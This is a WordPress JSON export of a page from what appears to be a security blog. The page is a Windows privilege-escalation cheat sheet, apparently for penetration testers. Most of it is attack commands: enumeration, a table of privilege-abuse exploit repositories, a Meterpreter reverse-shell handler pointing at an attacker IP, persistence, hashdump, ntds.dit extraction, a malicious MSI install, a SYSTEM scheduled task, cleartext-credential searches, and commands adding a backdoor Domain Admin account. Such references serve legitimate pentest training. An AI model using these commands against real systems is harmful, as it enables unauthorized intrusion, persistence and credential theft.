{"id":128,"date":"2021-04-24T00:55:21","date_gmt":"2021-04-24T00:55:21","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?page_id=128"},"modified":"2025-08-04T23:45:28","modified_gmt":"2025-08-04T23:45:28","slug":"windows-privilege-escalation-resources","status":"publish","type":"page","link":"https:\/\/sirensecurity.io\/blog\/windows-privilege-escalation-resources\/","title":{"rendered":"Windows Privilege Escalation - Resources"},"content":{"rendered":"\n<div class=\"wp-block-cover\"><img loading=\"lazy\" decoding=\"async\" width=\"2500\" height=\"1667\" class=\"wp-block-cover__image-background wp-image-95\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2021\/04\/9.jpg\" data-object-fit=\"cover\"\/><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p>Windows Privilege Escalation<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">S1REN<\/p>\n\n\n\n<p class=\"has-text-align-center has-large-font-size\">Going up.<\/p>\n<\/div><\/div>\n\n\n\n<p><strong>TL;DR<\/strong><br>+-------------------------------+<br>|            INITIAL ENUMERATION             |<br>+-------------------------------+<\/p>\n\n\n\n<p><strong>DOMAIN ENUM (if joined)<\/strong><br>BloodHound \/ SharpHound<\/p>\n\n\n\n<p><strong>WHOAMI?<\/strong><br>whoami<br>echo %username%<\/p>\n\n\n\n<p><strong>PRIVILEGES?<\/strong><br>whoami \/priv<\/p>\n\n\n\n<p><strong>SYSTEM INFO<\/strong><br>systeminfo<br>wmic os get Caption,CSDVersion,OSArchitecture,Version<\/p>\n\n\n\n<p><strong>SERVICES<\/strong><br>wmic service get name,startname<br>net start<\/p>\n\n\n\n<p><strong>ADMIN CHECK<\/strong><br>net localgroup administrators<br>net user<\/p>\n\n\n\n<p><strong>NETWORK<\/strong><br>netstat -anoy<br>route print<br>arp -A<br>ipconfig \/all<\/p>\n\n\n\n<p><strong>USERS<\/strong><br>net users<br>net user<br>net localgroup<\/p>\n\n\n\n<p><strong>FIREWALL<\/strong><br>netsh advfirewall firewall show rule name=all<\/p>\n\n\n\n<p><strong>SCHEDULED TASKS<\/strong><br>schtasks \/query \/fo LIST \/v &gt; schtasks.txt<\/p>\n\n\n\n<p>INSTALLATION RIGHTS<br>reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \/v AlwaysInstallElevated<br>reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \/v AlwaysInstallElevated<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>+-----------------------------------------------------------------------+\n|     WINDOWS PRIV ESC: GITHUB EXPLOITS                                 |\n+-----------------------------------------------------------------------+\n| Privilege Name              | GitHub PoC                              |\n|---------------------------- |-----------------------------------------|\n| SeDebugPrivilege            | github.com\/bruno-1337\/SeDebugPrivilege- |\n| SeImpersonatePrivilege      | github.com\/itm4n\/PrintSpoofer           |\n| SeAssignPrimaryToken        | github.com\/b4rdia\/HackTricks            |\n| SeTcbPrivilege              | github.com\/hatRiot\/token-priv           |\n| SeCreateTokenPrivilege      | github.com\/hatRiot\/token-priv           |\n| SeLoadDriverPrivilege       | github.com\/k4sth4\/SeLoadDriverPrivilege |\n| SeTakeOwnershipPrivilege    | github.com\/hatRiot\/token-priv           |\n| SeRestorePrivilege          | github.com\/xct\/SeRestoreAbuse           |\n| SeBackupPrivilege           | github.com\/k4sth4\/SeBackupPrivilege     |\n| SeIncreaseQuotaPrivilege    | github.com\/b4rdia\/HackTricks            |\n| SeSystemEnvironment         | github.com\/b4rdia\/HackTricks            |\n| SeMachineAccount            | github.com\/b4rdia\/HackTricks            |\n| SeTrustedCredManAccess      | learn.microsoft.com\/...trusted-caller   |\n| SeRelabelPrivilege          | github.com\/decoder-it\/RelabelAbuse      |\n| SeManageVolumePrivilege     | github.com\/CsEnox\/SeManageVolumeExploit |\n| SeCreateGlobalPrivilege     | github.com\/b4rdia\/HackTricks            |\n+-----------------------------------------------------------------------+\n\nNotes:\n- PrintSpoofer is gold for SeImpersonatePrivilege.\n- SeManageVolume has practical field PoCs.<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>+----------------------------+\n|     MAINTAINING ACCESS     |\n+----------------------------+\n&gt; METERPRETER REVERSE SHELL SETUP\n  msfconsole\n  use exploit\/multi\/handler\n  set PAYLOAD windows\/meterpreter\/reverse_tcp\n  set LHOST &lt;attacker_ip&gt;\n  set LPORT &lt;port&gt;\n  exploit\n\n&gt; PERSISTENCE\n  meterpreter &gt; run persistence -U -i 5 -p 443 -r &lt;LHOST&gt;\n\n&gt; PORT FORWARDING\n  meterpreter &gt; portfwd add -l 3306 -p 3306 -r &lt;target_ip&gt;\n\n&gt; SYSTEM MIGRATION\n  meterpreter &gt; run post\/windows\/manage\/migrate\n  meterpreter &gt; migrate &lt;PID&gt;\n\n&gt; EXECUTE PAYLOADS\n  powershell.exe \"C:\\Tools\\privesc.ps1\"\n\n+-------------------------------+\n|        PRIVES EC CHECKLIST    |\n+-------------------------------+\n&gt; UNQUOTED SERVICE PATHS\n  wmic service get name,displayname,pathname,startmode | findstr \/i \"auto\" | findstr \/v \"C:\\Windows\" | findstr \/v '\"'\n\n&gt; WEAK SERVICE PERMISSIONS\n  accesschk.exe -uwcqv &lt;service&gt;\n  sc qc &lt;service&gt;\n  icacls \"C:\\Path\\To\\Service.exe\"\n\n&gt; FILE TRANSFER OPTIONS\n  certutil.exe\n  powershell (IEX)\n  SMB \/ FTP \/ TFTP \/ VBScript\n\n&gt; CLEAR TEXT CREDENTIALS\n  findstr \/si password *.txt *.xml *.ini\n  dir \/s *pass* == *cred* == *.config*\n\n&gt; WEAK FILE PERMISSIONS\n  accesschk.exe -uwqs Users c:\\*.*\n  accesschk.exe -uwqs \"Authenticated Users\" c:\\*.*\n\n&gt; NEW ADMIN USER (Local\/Domain)\n  net user siren P@ssw0rd! \/add\n  net localgroup administrators siren \/add\n  net group \"Domain Admins\" siren \/add \/domain\n\n+--------------------------------+\n|     SCHEDULED TASK ABUSE       |\n+--------------------------------+\n&gt; ENUM\n  schtasks \/query \/fo LIST \/v &gt; tasks.txt\n\n&gt; CREATE SYSTEM TASK\n  schtasks \/create \/ru SYSTEM \/sc MINUTE \/mo 5 \/tn RUNME \/tr \"C:\\Tools\\sirenMaint.exe\"\n\n&gt; RUN TASK\n  schtasks \/run \/tn \"RUNME\"\n\n+-------------------------------+\n|    POST EXPLOIT ENUMERATION   |\n+-------------------------------+\n&gt; NETWORK USERS\n  net user\n  net user &lt;target&gt;\n  net localgroup administrators\n\n&gt; NT AUTHORITY CHECKS\n  whoami\n  accesschk.exe \/accepteula\n  MS09-012.exe \"whoami\"\n\n&gt; HASH DUMP\n  meterpreter &gt; hashdump\n\n&gt; EXFILTRATE ntds.dit\n  Use secretsdump.py or disk capture tools\n\n&gt; INSTALLER ABUSE\n  AlwaysInstallElevated = 1\n  msiexec \/i evil.msi\n\n&gt; SHARE ENUMERATION\n  net share\n  net use\n  net use Z: \\\\TARGET\\SHARE \/persistent:yes\n\n+----------------------------+\n|   TOOLKIT \/ RESOURCES      |\n+----------------------------+\n&gt; Windows Exploit Suggester\n  https:&#47;&#47;github.com\/AonCyberLabs\/Windows-Exploit-Suggester\n\n&gt; Cross Compile Payloads (Linux &gt; Windows)\n  apt-get install mingw-w64\n  x86: i686-w64-mingw32-gcc hello.c -o hello.exe\n  x64: x86_64-w64-mingw32-gcc hello.c -o hello64.exe\n\n&gt; Additional Reading\n  https:\/\/www.fuzzysecurity.com\/tutorials\/16.html\n  https:\/\/book.hacktricks.xyz\/windows\/windows-local-privilege-escalation\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>\n\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>\n<\/code><\/pre>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>TL;DR+-------------------------------+| INITIAL ENUMERATION |+-------------------------------+ DOMAIN ENUM (if joined)BloodHound \/ SharpHound WHOAMI?whoamiecho %username% PRIVILEGES?whoami \/priv SYSTEM INFOsysteminfowmic os get Caption,CSDVersion,OSArchitecture,Version SERVICESwmic service get name,startnamenet start ADMIN CHECKnet localgroup administratorsnet user NETWORKnetstat -anoyroute printarp -Aipconfig \/all USERSnet usersnet usernet localgroup FIREWALLnetsh advfirewall firewall show rule name=all SCHEDULED TASKSschtasks \/query \/fo LIST \/v &gt; schtasks.txt INSTALLATION RIGHTSreg query [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-128","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/128","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=128"}],"version-history":[{"count":31,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/128\/revisions"}],"predecessor-version":[{"id":724,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/128\/revisions\/724"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=128"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}